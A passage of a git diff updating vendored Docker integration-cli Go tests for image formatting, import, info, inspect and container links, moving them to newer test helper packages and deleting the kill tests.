@@ func (s *DockerSuite) TestImagesFormat(c *check.C) { expected := []string{"myimage", "myimage"} var names []string names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) + c.Assert(names, checker.DeepEquals, expected, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) } // ImagesDefaultFormatAndQuiet diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go index 57dc2a6698..9f8e915803 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go @@ -9,9 +9,10 @@ import ( "regexp" "strings" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestImportDisplay(c *check.C) { @@ -19,7 +20,7 @@ func (s *DockerSuite) TestImportDisplay(c *check.C) { out, _ := dockerCmd(c, "run", "-d", "busybox", "true") cleanedContainerID := strings.TrimSpace(out) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "export", cleanedContainerID), exec.Command(dockerBinary, "import", "-"), ) @@ -51,11 +52,10 @@ func (s *DockerSuite) TestImportFile(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) defer os.Remove(temporaryFile.Name()) - runCmd := exec.Command(dockerBinary, "export", "test-import") - runCmd.Stdout = bufio.NewWriter(temporaryFile) - - _, err = runCommand(runCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "export", "test-import"}, + Stdout: bufio.NewWriter(temporaryFile), + }).Assert(c, icmd.Success) out, _ := dockerCmd(c, "import", temporaryFile.Name()) c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't")) @@ -73,14 +73,12 @@ func (s *DockerSuite) TestImportGzipped(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) defer os.Remove(temporaryFile.Name()) - runCmd := exec.Command(dockerBinary, "export", "test-import") w := gzip.NewWriter(temporaryFile) - runCmd.Stdout = w - - _, err = runCommand(runCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) - err = w.Close() - c.Assert(err, checker.IsNil, check.Commentf("failed to close gzip writer")) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "export", "test-import"}, + Stdout: w, + }).Assert(c, icmd.Success) + c.Assert(w.Close(), checker.IsNil, check.Commentf("failed to close gzip writer")) temporaryFile.Close() out, _ := dockerCmd(c, "import", temporaryFile.Name()) c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't")) @@ -98,11 +96,10 @@ func (s *DockerSuite) TestImportFileWithMessage(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) defer os.Remove(temporaryFile.Name()) - runCmd := exec.Command(dockerBinary, "export", "test-import") - runCmd.Stdout = bufio.NewWriter(temporaryFile) - - _, err = runCommand(runCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to export a container")) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "export", "test-import"}, + Stdout: bufio.NewWriter(temporaryFile), + }).Assert(c, icmd.Success) message := "Testing commit message" out, _ := dockerCmd(c, "import", "-m", message, temporaryFile.Name()) @@ -129,22 +126,17 @@ func (s *DockerSuite) TestImportFileNonExistentFile(c *check.C) { func (s *DockerSuite) TestImportWithQuotedChanges(c *check.C) { testRequires(c, DaemonIsLinux) - dockerCmd(c, "run", "--name", "test-import", "busybox", "true") + cli.DockerCmd(c, "run", "--name", "test-import", "busybox", "true") temporaryFile, err := ioutil.TempFile("", "exportImportTest") c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) defer os.Remove(temporaryFile.Name()) - result := icmd.RunCmd(icmd.Cmd{ - Command: binaryWithArgs("export", "test-import"), - Stdout: bufio.NewWriter(temporaryFile), - }) - c.Assert(result, icmd.Matches, icmd.Success) + cli.Docker(cli.Args("export", "test-import"), cli.WithStdout(bufio.NewWriter(temporaryFile))).Assert(c, icmd.Success) - result = dockerCmdWithResult("import", "-c", `ENTRYPOINT ["/bin/sh", "-c"]`, temporaryFile.Name()) - c.Assert(result, icmd.Matches, icmd.Success) + result := cli.DockerCmd(c, "import", "-c", `ENTRYPOINT ["/bin/sh", "-c"]`, temporaryFile.Name()) image := strings.TrimSpace(result.Stdout()) - result = dockerCmdWithResult("run", "--rm", image, "true") - c.Assert(result, icmd.Matches, icmd.Expected{Out: icmd.None}) + result = cli.DockerCmd(c, "run", "--rm", image, "true") + result.Assert(c, icmd.Expected{Out: icmd.None}) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go index 62ce7e22f2..65091029ee 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go @@ -6,7 +6,9 @@ import ( "net" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" "github.com/go-check/check" ) @@ -35,15 +37,15 @@ func (s *DockerSuite) TestInfoEnsureSucceeds(c *check.C) { "Live Restore Enabled:", } - if daemonPlatform == "linux" { + if testEnv.OSType == "linux" { stringsToCheck = append(stringsToCheck, "Init Binary:", "Security Options:", "containerd version:", "runc version:", "init version:") } - if DaemonIsLinux.Condition() { + if DaemonIsLinux() { stringsToCheck = append(stringsToCheck, "Runtimes:", "Default Runtime: runc") } - if experimentalDaemon { + if testEnv.DaemonInfo.ExperimentalBuild { stringsToCheck = append(stringsToCheck, "Experimental: true") } else { stringsToCheck = append(stringsToCheck, "Experimental: false") @@ -70,12 +72,11 @@ func (s *DockerSuite) TestInfoFormat(c *check.C) { func (s *DockerSuite) TestInfoDiscoveryBackend(c *check.C) { testRequires(c, SameHostDaemon, DaemonIsLinux) - d := NewDaemon(c) + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) discoveryBackend := "consul://consuladdr:consulport/some/path" discoveryAdvertise := "1.1.1.1:2375" - err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s", discoveryAdvertise)) - c.Assert(err, checker.IsNil) - defer d.Stop() + d.Start(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s", discoveryAdvertise)) + defer d.Stop(c) out, err := d.Cmd("info") c.Assert(err, checker.IsNil) @@ -88,16 +89,16 @@ func (s *DockerSuite) TestInfoDiscoveryBackend(c *check.C) { func (s *DockerSuite) TestInfoDiscoveryInvalidAdvertise(c *check.C) { testRequires(c, SameHostDaemon, DaemonIsLinux) - d := NewDaemon(c) + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) discoveryBackend := "consul://consuladdr:consulport/some/path" // --cluster-advertise with an invalid string is an error - err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), "--cluster-advertise=invalid") - c.Assert(err, checker.Not(checker.IsNil)) + err := d.StartWithError(fmt.Sprintf("--cluster-store=%s", discoveryBackend), "--cluster-advertise=invalid") + c.Assert(err, checker.NotNil) // --cluster-advertise without --cluster-store is also an error - err = d.Start("--cluster-advertise=1.1.1.1:2375") - c.Assert(err, checker.Not(checker.IsNil)) + err = d.StartWithError("--cluster-advertise=1.1.1.1:2375") + c.Assert(err, checker.NotNil) } // TestInfoDiscoveryAdvertiseInterfaceName verifies that a daemon run with `--cluster-advertise` @@ -105,13 +106,12 @@ func (s *DockerSuite) TestInfoDiscoveryInvalidAdvertise(c *check.C) { func (s *DockerSuite) TestInfoDiscoveryAdvertiseInterfaceName(c *check.C) { testRequires(c, SameHostDaemon, Network, DaemonIsLinux) - d := NewDaemon(c) + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) discoveryBackend := "consul://consuladdr:consulport/some/path" discoveryAdvertise := "eth0" - err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s:2375", discoveryAdvertise)) - c.Assert(err, checker.IsNil) - defer d.Stop() + d.Start(c, fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s:2375", discoveryAdvertise)) + defer d.Stop(c) iface, err := net.InterfaceByName(discoveryAdvertise) c.Assert(err, checker.IsNil) @@ -130,51 +130,56 @@ func (s *DockerSuite) TestInfoDiscoveryAdvertiseInterfaceName(c *check.C) { func (s *DockerSuite) TestInfoDisplaysRunningContainers(c *check.C) { testRequires(c, DaemonIsLinux) + existing := existingContainerStates(c) + dockerCmd(c, "run", "-d", "busybox", "top") out, _ := dockerCmd(c, "info") - c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 1)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", existing["Containers"]+1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", existing["ContainersRunning"]+1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", existing["ContainersPaused"])) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", existing["ContainersStopped"])) } func (s *DockerSuite) TestInfoDisplaysPausedContainers(c *check.C) { testRequires(c, IsPausable) - out, _ := runSleepingContainer(c, "-d") + existing := existingContainerStates(c) + + out := runSleepingContainer(c, "-d") cleanedContainerID := strings.TrimSpace(out) dockerCmd(c, "pause", cleanedContainerID) out, _ = dockerCmd(c, "info") - c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 1)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", existing["Containers"]+1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", existing["ContainersRunning"])) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", existing["ContainersPaused"]+1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", existing["ContainersStopped"])) } func (s *DockerSuite) TestInfoDisplaysStoppedContainers(c *check.C) { testRequires(c, DaemonIsLinux) + existing := existingContainerStates(c) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") cleanedContainerID := strings.TrimSpace(out) dockerCmd(c, "stop", cleanedContainerID) out, _ = dockerCmd(c, "info") - c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0)) - c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", existing["Containers"]+1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", existing["ContainersRunning"])) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", existing["ContainersPaused"])) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", existing["ContainersStopped"]+1)) } func (s *DockerSuite) TestInfoDebug(c *check.C) { testRequires(c, SameHostDaemon, DaemonIsLinux) - d := NewDaemon(c) - err := d.Start("--debug") - c.Assert(err, checker.IsNil) - defer d.Stop() + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + d.Start(c, "--debug") + defer d.Stop(c) out, err := d.Cmd("--debug", "info") c.Assert(err, checker.IsNil) @@ -193,10 +198,9 @@ func (s *DockerSuite) TestInsecureRegistries(c *check.C) { registryCIDR := "192.168.1.0/24" registryHost := "insecurehost.com:5000" - d := NewDaemon(c) - err := d.Start("--insecure-registry="+registryCIDR, "--insecure-registry="+registryHost) - c.Assert(err, checker.IsNil) - defer d.Stop() + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + d.Start(c, "--insecure-registry="+registryCIDR, "--insecure-registry="+registryHost) + defer d.Stop(c) out, err := d.Cmd("info") c.Assert(err, checker.IsNil) @@ -211,8 +215,7 @@ func (s *DockerDaemonSuite) TestRegistryMirrors(c *check.C) { registryMirror1 := "https://192.168.1.2" registryMirror2 := "http://registry.mirror.com:5000" - err := s.d.Start("--registry-mirror="+registryMirror1, "--registry-mirror="+registryMirror2) - c.Assert(err, checker.IsNil) + s.d.Start(c, "--registry-mirror="+registryMirror1, "--registry-mirror="+registryMirror2) out, err := s.d.Cmd("info") c.Assert(err, checker.IsNil) @@ -221,14 +224,15 @@ func (s *DockerDaemonSuite) TestRegistryMirrors(c *check.C) { c.Assert(out, checker.Contains, fmt.Sprintf(" %s", registryMirror2)) } -// Test case for #24392 -func (s *DockerDaemonSuite) TestInfoLabels(c *check.C) { - testRequires(c, SameHostDaemon, DaemonIsLinux) - - err := s.d.Start("--label", `test.empty=`, "--label", `test.empty=`, "--label", `test.label="1"`, "--label", `test.label="2"`) - c.Assert(err, checker.IsNil) - - out, err := s.d.Cmd("info") +func existingContainerStates(c *check.C) map[string]int { + out, _ := dockerCmd(c, "info", "--format", "{{json .}}") + var m map[string]interface{} + err := json.Unmarshal([]byte(out), &m) c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "WARNING: labels with duplicate keys and conflicting values have been deprecated") + res := map[string]int{} + res["Containers"] = int(m["Containers"].(float64)) + res["ContainersRunning"] = int(m["ContainersRunning"].(float64)) + res["ContainersPaused"] = int(m["ContainersPaused"].(float64)) + res["ContainersStopped"] = int(m["ContainersStopped"].(float64)) + return res } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go index b9323060dd..d55c05c4a5 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go @@ -3,7 +3,7 @@ package main import ( - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go index 32ed28afe1..d027c44775 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go @@ -4,15 +4,15 @@ import ( "encoding/json" "fmt" "os" - "os/exec" "strconv" "strings" "time" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) func checkValidGraphDriver(c *check.C, name string) { @@ -53,10 +53,7 @@ func (s *DockerSuite) TestInspectDefault(c *check.C) { } func (s *DockerSuite) TestInspectStatus(c *check.C) { - if daemonPlatform != "windows" { - defer unpauseAllContainers() - } - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") out = strings.TrimSpace(out) inspectOut := inspectField(c, out, "State.Status") @@ -64,7 +61,7 @@ func (s *DockerSuite) TestInspectStatus(c *check.C) { // Windows does not support pause/unpause on Windows Server Containers. // (RS1 does for Hyper-V Containers, but production CI is not setup for that) - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { dockerCmd(c, "pause", out) inspectOut = inspectField(c, out, "State.Status") c.Assert(inspectOut, checker.Equals, "paused") @@ -142,11 +139,12 @@ func (s *DockerSuite) TestInspectImageFilterInt(c *check.C) { } func (s *DockerSuite) TestInspectContainerFilterInt(c *check.C) { - runCmd := exec.Command(dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat") - runCmd.Stdin = strings.NewReader("blahblah") - out, _, _, err := runCommandWithStdoutStderr(runCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to run container: %v, output: %q", err, out)) - + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat"}, + Stdin: strings.NewReader("blahblah"), + }) + result.Assert(c, icmd.Success) + out := result.Stdout() id := strings.TrimSpace(out) out = inspectField(c, id, "State.ExitCode") @@ -157,9 +155,9 @@ func (s *DockerSuite) TestInspectContainerFilterInt(c *check.C) { //now get the exit code to verify formatStr := fmt.Sprintf("--format={{eq .State.ExitCode %d}}", exitCode) out, _ = dockerCmd(c, "inspect", formatStr, id) - result, err := strconv.ParseBool(strings.TrimSuffix(out, "\n")) + inspectResult, err := strconv.ParseBool(strings.TrimSuffix(out, "\n")) c.Assert(err, checker.IsNil) - c.Assert(result, checker.Equals, true) + c.Assert(inspectResult, checker.Equals, true) } func (s *DockerSuite) TestInspectImageGraphDriver(c *check.C) { @@ -208,12 +206,8 @@ func (s *DockerSuite) TestInspectContainerGraphDriver(c *check.C) { func (s *DockerSuite) TestInspectBindMountPoint(c *check.C) { modifier := ",z" prefix, slash := getPrefixAndSlashFromDaemonPlatform() - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { modifier = "" - // TODO Windows: Temporary check - remove once TP5 support is dropped - if windowsDaemonKV < 14350 { - c.Skip("Needs later Windows build for RO volumes") - } // Linux creates the host directory if it doesn't exist. Windows does not. os.Mkdir(`c:\data`, os.ModeDir) } @@ -235,7 +229,7 @@ func (s *DockerSuite) TestInspectBindMountPoint(c *check.C) { c.Assert(m.Driver, checker.Equals, "") c.Assert(m.Source, checker.Equals, prefix+slash+"data") c.Assert(m.Destination, checker.Equals, prefix+slash+"data") - if daemonPlatform != "windows" { // Windows does not set mode + if testEnv.OSType != "windows" { // Windows does not set mode c.Assert(m.Mode, checker.Equals, "ro"+modifier) } c.Assert(m.RW, checker.Equals, false) @@ -308,7 +302,7 @@ func (s *DockerSuite) TestInspectNoSizeFlagContainer(c *check.C) { formatStr := "--format={{.SizeRw}},{{.SizeRootFs}}" out, _ := dockerCmd(c, "inspect", "--type=container", formatStr, "busybox") - c.Assert(strings.TrimSpace(out), check.Equals, ",", check.Commentf("Exepcted not to display size info: %s", out)) + c.Assert(strings.TrimSpace(out), check.Equals, ",", check.Commentf("Expected not to display size info: %s", out)) } func (s *DockerSuite) TestInspectSizeFlagContainer(c *check.C) { @@ -356,14 +350,22 @@ func (s *DockerSuite) TestInspectByPrefix(c *check.C) { } func (s *DockerSuite) TestInspectStopWhenNotFound(c *check.C) { - runSleepingContainer(c, "--name=busybox", "-d") - runSleepingContainer(c, "--name=not-shown", "-d") - out, _, err := dockerCmdWithError("inspect", "--type=container", "--format='{{.Name}}'", "busybox", "missing", "not-shown") - - c.Assert(err, checker.Not(check.IsNil)) - c.Assert(out, checker.Contains, "busybox") - c.Assert(out, checker.Not(checker.Contains), "not-shown") - c.Assert(out, checker.Contains, "Error: No such container: missing") + runSleepingContainer(c, "--name=busybox1", "-d") + runSleepingContainer(c, "--name=busybox2", "-d") + result := dockerCmdWithResult("inspect", "--type=container", "--format='{{.Name}}'", "busybox1", "busybox2", "missing") + + c.Assert(result.Error, checker.Not(check.IsNil)) + c.Assert(result.Stdout(), checker.Contains, "busybox1") + c.Assert(result.Stdout(), checker.Contains, "busybox2") + c.Assert(result.Stderr(), checker.Contains, "Error: No such container: missing") + + // test inspect would not fast fail + result = dockerCmdWithResult("inspect", "--type=container", "--format='{{.Name}}'", "missing", "busybox1", "busybox2") + + c.Assert(result.Error, checker.Not(check.IsNil)) + c.Assert(result.Stdout(), checker.Contains, "busybox1") + c.Assert(result.Stdout(), checker.Contains, "busybox2") + c.Assert(result.Stderr(), checker.Contains, "Error: No such container: missing") } func (s *DockerSuite) TestInspectHistory(c *check.C) { @@ -456,11 +458,3 @@ func (s *DockerSuite) TestInspectUnknownObject(c *check.C) { c.Assert(out, checker.Contains, "Error: No such object: foobar") c.Assert(err.Error(), checker.Contains, "Error: No such object: foobar") } - -func (s *DockerSuite) TestInpectInvalidReference(c *check.C) { - // This test should work on both Windows and Linux - out, _, err := dockerCmdWithError("inspect", "FooBar") - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "Error: No such object: FooBar") - c.Assert(err.Error(), checker.Contains, "Error: No such object: FooBar") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go deleted file mode 100644 index 43164801d4..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go +++ /dev/null @@ -1,134 +0,0 @@ -package main - -import ( - "fmt" - "net/http" - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestKillContainer(c *check.C) { - out, _ := runSleepingContainer(c, "-d") - cleanedContainerID := strings.TrimSpace(out) - c.Assert(waitRun(cleanedContainerID), check.IsNil) - - dockerCmd(c, "kill", cleanedContainerID) - c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) - - out, _ = dockerCmd(c, "ps", "-q") - c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running")) - -} - -func (s *DockerSuite) TestKillOffStoppedContainer(c *check.C) { - out, _ := runSleepingContainer(c, "-d") - cleanedContainerID := strings.TrimSpace(out) - - dockerCmd(c, "stop", cleanedContainerID) - c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) - - _, _, err := dockerCmdWithError("kill", "-s", "30", cleanedContainerID) - c.Assert(err, check.Not(check.IsNil), check.Commentf("Container %s is not running", cleanedContainerID)) -} - -func (s *DockerSuite) TestKillDifferentUserContainer(c *check.C) { - // TODO Windows: Windows does not yet support -u (Feb 2016). - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-u", "daemon", "-d", "busybox", "top") - cleanedContainerID := strings.TrimSpace(out) - c.Assert(waitRun(cleanedContainerID), check.IsNil) - - dockerCmd(c, "kill", cleanedContainerID) - c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) - - out, _ = dockerCmd(c, "ps", "-q") - c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running")) - -} - -// regression test about correct signal parsing see #13665 -func (s *DockerSuite) TestKillWithSignal(c *check.C) { - // Cannot port to Windows - does not support signals in the same way Linux does - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "busybox", "top") - cid := strings.TrimSpace(out) - c.Assert(waitRun(cid), check.IsNil) - - dockerCmd(c, "kill", "-s", "SIGWINCH", cid) - time.Sleep(250 * time.Millisecond) - - running := inspectField(c, cid, "State.Running") - - c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after SIGWINCH")) -} - -func (s *DockerSuite) TestKillWithStopSignalWithSameSignalShouldDisableRestartPolicy(c *check.C) { - // Cannot port to Windows - does not support signals int the same way as Linux does - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "--stop-signal=TERM", "--restart=always", "busybox", "top") - cid := strings.TrimSpace(out) - c.Assert(waitRun(cid), check.IsNil) - - // Let docker send a TERM signal to the container - // It will kill the process and disable the restart policy - dockerCmd(c, "kill", "-s", "TERM", cid) - c.Assert(waitExited(cid, 10*time.Second), check.IsNil) - - out, _ = dockerCmd(c, "ps", "-q") - c.Assert(out, checker.Not(checker.Contains), cid, check.Commentf("killed container is still running")) -} - -func (s *DockerSuite) TestKillWithStopSignalWithDifferentSignalShouldKeepRestartPolicy(c *check.C) { - // Cannot port to Windows - does not support signals int the same way as Linux does - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "--stop-signal=CONT", "--restart=always", "busybox", "top") - cid := strings.TrimSpace(out) - c.Assert(waitRun(cid), check.IsNil) - - // Let docker send a TERM signal to the container - // It will kill the process, but not disable the restart policy - dockerCmd(c, "kill", "-s", "TERM", cid) - c.Assert(waitRestart(cid, 10*time.Second), check.IsNil) - - // Restart policy should still be in place, so it should be still running - c.Assert(waitRun(cid), check.IsNil) -} - -// FIXME(vdemeester) should be a unit test -func (s *DockerSuite) TestKillWithInvalidSignal(c *check.C) { - out, _ := runSleepingContainer(c, "-d") - cid := strings.TrimSpace(out) - c.Assert(waitRun(cid), check.IsNil) - - out, _, err := dockerCmdWithError("kill", "-s", "0", cid) - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, "Invalid signal: 0", check.Commentf("Kill with an invalid signal didn't error out correctly")) - - running := inspectField(c, cid, "State.Running") - c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after an invalid signal")) - - out, _ = runSleepingContainer(c, "-d") - cid = strings.TrimSpace(out) - c.Assert(waitRun(cid), check.IsNil) - - out, _, err = dockerCmdWithError("kill", "-s", "SIG42", cid) - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, "Invalid signal: SIG42", check.Commentf("Kill with an invalid signal error out correctly")) - - running = inspectField(c, cid, "State.Running") - c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after an invalid signal")) - -} - -func (s *DockerSuite) TestKillStoppedContainerAPIPre120(c *check.C) { - testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later - runSleepingContainer(c, "--name", "docker-kill-test-api", "-d") - dockerCmd(c, "stop", "docker-kill-test-api") - - status, _, err := sockRequest("POST", fmt.Sprintf("/v1.19/containers/%s/kill", "docker-kill-test-api"), nil) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusNoContent) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go index a5872d9e0c..17b25d7994 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go @@ -4,9 +4,10 @@ import ( "encoding/json" "fmt" "regexp" + "sort" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/runconfig" "github.com/go-check/check" ) @@ -27,7 +28,9 @@ func (s *DockerSuite) TestLinksInvalidContainerTarget(c *check.C) { // an invalid container target should produce an error c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) // an invalid container target should produce an error - c.Assert(out, checker.Contains, "Could not get container") + // note: convert the output to lowercase first as the error string + // capitalization was changed after API version 1.32 + c.Assert(strings.ToLower(out), checker.Contains, "could not get container") } func (s *DockerSuite) TestLinksPingLinkedContainers(c *check.C) { @@ -89,40 +92,41 @@ func (s *DockerSuite) TestLinksPingLinkedContainersAfterRename(c *check.C) { func (s *DockerSuite) TestLinksInspectLinksStarted(c *check.C) { testRequires(c, DaemonIsLinux) - var ( - expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}} - result []string - ) dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top") dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", "--link", "container2:alias2", "busybox", "top") links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links") + var result []string err := json.Unmarshal([]byte(links), &result) c.Assert(err, checker.IsNil) - output := convertSliceOfStringsToMap(result) - - c.Assert(output, checker.DeepEquals, expected) + var expected = []string{ + "/container1:/testinspectlink/alias1", + "/container2:/testinspectlink/alias2", + } + sort.Strings(result) + c.Assert(result, checker.DeepEquals, expected) } func (s *DockerSuite) TestLinksInspectLinksStopped(c *check.C) { testRequires(c, DaemonIsLinux) - var ( - expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}} - result []string - ) + dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top") dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top") dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", "--link", "container2:alias2", "busybox", "true") links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links") + var result []string err := json.Unmarshal([]byte(links), &result) c.Assert(err, checker.IsNil) - output := convertSliceOfStringsToMap(result) - - c.Assert(output, checker.DeepEquals, expected) + var expected = []string{ + "/container1:/testinspectlink/alias1", + "/container2:/testinspectlink/alias2", + } + sort.Strings(result) + c.Assert(result, checker.DeepEquals, expected) } func (s *DockerSuite) TestLinksNotStartedParentNotFail(c *check.C) { @@ -145,11 +149,8 @@ func (s *DockerSuite) TestLinksHostsFilesInject(c *check.C) { c.Assert(waitRun(idTwo), checker.IsNil) - contentOne, err := readContainerFileWithExec(idOne, "/etc/hosts") - c.Assert(err, checker.IsNil, check.Commentf("contentOne: %s", string(contentOne))) - - contentTwo, err := readContainerFileWithExec(idTwo, "/etc/hosts") - c.Assert(err, checker.IsNil, check.Commentf("contentTwo: %s", string(contentTwo))) + readContainerFileWithExec(c, idOne, "/etc/hosts") + contentTwo := readContainerFileWithExec(c, idTwo, "/etc/hosts") // Host is not present in updated 